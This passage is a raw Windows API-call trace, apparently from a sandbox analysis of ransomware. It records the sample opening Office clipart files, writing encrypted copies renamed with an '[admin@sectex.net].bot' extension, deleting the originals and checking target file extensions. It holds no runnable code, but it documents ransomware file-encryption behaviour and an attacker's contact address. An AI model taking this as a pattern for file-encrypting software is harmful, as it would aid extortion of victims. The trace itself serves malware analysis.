	[0142.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.762] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1330) returned 1
	[0142.762] CloseHandle (hObject=0x3d0) returned 1
	[0142.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf")) returned 0x20
	[0142.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.763] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.763] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0142.764] GetLastError () returned 0x0
	[0142.764] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x532, lpOverlapped=0x0) returned 1
	[0142.938] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x540, lpOverlapped=0x0) returned 1
	[0142.938] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.938] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.939] SetEndOfFile (hFile=0x3c8) returned 1
	[0142.939] CloseHandle (hObject=0x3c8) returned 1
	[0142.939] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.939] SetEndOfFile (hFile=0x3d0) returned 1
	[0142.943] CloseHandle (hObject=0x3d0) returned 1
	[0142.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf")) returned 1
	[0142.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.954] lstrlenW (lpString=".doc") returned 4
	[0142.954] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.954] lstrlenW (lpString=".docx") returned 5
	[0142.954] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.954] lstrlenW (lpString=".pdf") returned 4
	[0142.954] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.954] lstrlenW (lpString=".xls") returned 4
	[0142.954] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.954] lstrlenW (lpString=".xlsx") returned 5
	[0142.954] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.954] lstrlenW (lpString=".ppt") returned 4
	[0142.954] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.954] lstrlenW (lpString=".zip") returned 4
	[0142.954] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.954] lstrlenW (lpString=".rar") returned 4
	[0142.955] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.955] lstrlenW (lpString=".bz2") returned 4
	[0142.955] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.955] lstrlenW (lpString=".7z") returned 3
	[0142.955] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.955] lstrlenW (lpString=".dbf") returned 4
	[0142.955] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.955] lstrlenW (lpString=".1cd") returned 4
	[0142.955] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.955] lstrlenW (lpString=".jpg") returned 4
	[0142.955] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.955] lstrlenW (lpString=".doc") returned 4
	[0142.955] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.955] lstrlenW (lpString=".docx") returned 5
	[0142.955] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.955] lstrlenW (lpString=".pdf") returned 4
	[0142.955] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.955] lstrlenW (lpString=".xls") returned 4
	[0142.955] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.955] lstrlenW (lpString=".xlsx") returned 5
	[0142.955] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.955] lstrlenW (lpString=".ppt") returned 4
	[0142.955] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.955] lstrlenW (lpString=".zip") returned 4
	[0142.955] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.956] lstrlenW (lpString=".rar") returned 4
	[0142.956] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.956] lstrlenW (lpString=".bz2") returned 4
	[0142.956] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.956] lstrlenW (lpString=".7z") returned 3
	[0142.956] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.956] lstrlenW (lpString=".dbf") returned 4
	[0142.956] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.956] lstrlenW (lpString=".1cd") returned 4
	[0142.956] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63
	[0142.956] lstrlenW (lpString=".jpg") returned 4
	[0142.956] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.956] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.956] lstrlenW (lpString="BS00092_.WMF") returned 12
	[0142.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0142.957] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=7974) returned 1
	[0142.957] CloseHandle (hObject=0x31c) returned 1
	[0142.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf")) returned 0x20
	[0142.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0142.957] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.957] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.958] GetLastError () returned 0x0
	[0142.958] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1f26, lpOverlapped=0x0) returned 1
	[0142.962] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1f30, lpOverlapped=0x0) returned 1
	[0142.963] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.963] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.963] SetEndOfFile (hFile=0x3c4) returned 1
	[0142.963] CloseHandle (hObject=0x3c4) returned 1
	[0142.963] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.963] SetEndOfFile (hFile=0x31c) returned 1
	[0142.965] CloseHandle (hObject=0x31c) returned 1
	[0142.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.966] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf")) returned 1
	[0142.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.966] lstrlenW (lpString=".doc") returned 4
	[0142.966] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.966] lstrlenW (lpString=".docx") returned 5
	[0142.966] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.966] lstrlenW (lpString=".pdf") returned 4
	[0142.967] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.967] lstrlenW (lpString=".xls") returned 4
	[0142.967] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.967] lstrlenW (lpString=".xlsx") returned 5
	[0142.967] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.967] lstrlenW (lpString=".ppt") returned 4
	[0142.967] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.967] lstrlenW (lpString=".zip") returned 4
	[0142.967] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.967] lstrlenW (lpString=".rar") returned 4
	[0142.967] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.967] lstrlenW (lpString=".bz2") returned 4
	[0142.967] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.967] lstrlenW (lpString=".7z") returned 3
	[0142.967] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.967] lstrlenW (lpString=".dbf") returned 4
	[0142.967] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.967] lstrlenW (lpString=".1cd") returned 4
	[0142.967] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.967] lstrlenW (lpString=".jpg") returned 4
	[0142.967] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.967] lstrlenW (lpString=".doc") returned 4
	[0142.967] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0142.967] lstrlenW (lpString=".docx") returned 5
	[0142.967] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0142.968] lstrlenW (lpString=".pdf") returned 4
	[0142.968] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0142.968] lstrlenW (lpString=".xls") returned 4
	[0142.968] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0142.968] lstrlenW (lpString=".xlsx") returned 5
	[0142.968] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0142.968] lstrlenW (lpString=".ppt") returned 4
	[0142.968] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0142.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.968] lstrlenW (lpString=".zip") returned 4
	[0142.968] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0142.968] lstrlenW (lpString=".rar") returned 4
	[0142.968] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0142.968] lstrlenW (lpString=".bz2") returned 4
	[0142.968] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0142.968] lstrlenW (lpString=".7z") returned 3
	[0142.968] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0142.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.968] lstrlenW (lpString=".dbf") returned 4
	[0142.968] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0142.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.968] lstrlenW (lpString=".1cd") returned 4
	[0142.968] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0142.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63
	[0142.968] lstrlenW (lpString=".jpg") returned 4
	[0142.968] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0142.968] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0142.968] lstrlenW (lpString="BS00100_.WMF") returned 12
	[0142.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0142.969] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2378) returned 1
	[0142.969] CloseHandle (hObject=0x31c) returned 1
	[0142.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf")) returned 0x20
	[0142.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0142.969] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.969] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.971] GetLastError () returned 0x0
	[0142.971] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x94a, lpOverlapped=0x0) returned 1
	[0143.145] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x950, lpOverlapped=0x0) returned 1
	[0143.146] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.146] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.146] SetEndOfFile (hFile=0x3c4) returned 1
	[0143.146] CloseHandle (hObject=0x3c4) returned 1
	[0143.146] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.146] SetEndOfFile (hFile=0x31c) returned 1
	[0143.195] CloseHandle (hObject=0x31c) returned 1
	[0143.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf")) returned 1
	[0143.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.219] lstrlenW (lpString=".doc") returned 4
	[0143.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.220] lstrlenW (lpString=".docx") returned 5
	[0143.220] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.220] lstrlenW (lpString=".pdf") returned 4
	[0143.220] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.220] lstrlenW (lpString=".xls") returned 4
	[0143.220] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.220] lstrlenW (lpString=".xlsx") returned 5
	[0143.220] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.220] lstrlenW (lpString=".ppt") returned 4
	[0143.220] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.220] lstrlenW (lpString=".zip") returned 4
	[0143.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.220] lstrlenW (lpString=".rar") returned 4
	[0143.220] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.220] lstrlenW (lpString=".bz2") returned 4
	[0143.220] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.220] lstrlenW (lpString=".7z") returned 3
	[0143.220] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.220] lstrlenW (lpString=".dbf") returned 4
	[0143.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.220] lstrlenW (lpString=".1cd") returned 4
	[0143.220] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.220] lstrlenW (lpString=".jpg") returned 4
	[0143.220] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.220] lstrlenW (lpString=".doc") returned 4
	[0143.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.221] lstrlenW (lpString=".docx") returned 5
	[0143.221] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.221] lstrlenW (lpString=".pdf") returned 4
	[0143.221] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.221] lstrlenW (lpString=".xls") returned 4
	[0143.221] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.221] lstrlenW (lpString=".xlsx") returned 5
	[0143.221] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.221] lstrlenW (lpString=".ppt") returned 4
	[0143.221] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.221] lstrlenW (lpString=".zip") returned 4
	[0143.221] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.221] lstrlenW (lpString=".rar") returned 4
	[0143.221] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.221] lstrlenW (lpString=".bz2") returned 4
	[0143.221] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.221] lstrlenW (lpString=".7z") returned 3
	[0143.221] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.221] lstrlenW (lpString=".dbf") returned 4
	[0143.221] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.221] lstrlenW (lpString=".1cd") returned 4
	[0143.221] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63
	[0143.221] lstrlenW (lpString=".jpg") returned 4
	[0143.221] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.221] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.222] lstrlenW (lpString="BS00438_.WMF") returned 12
	[0143.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
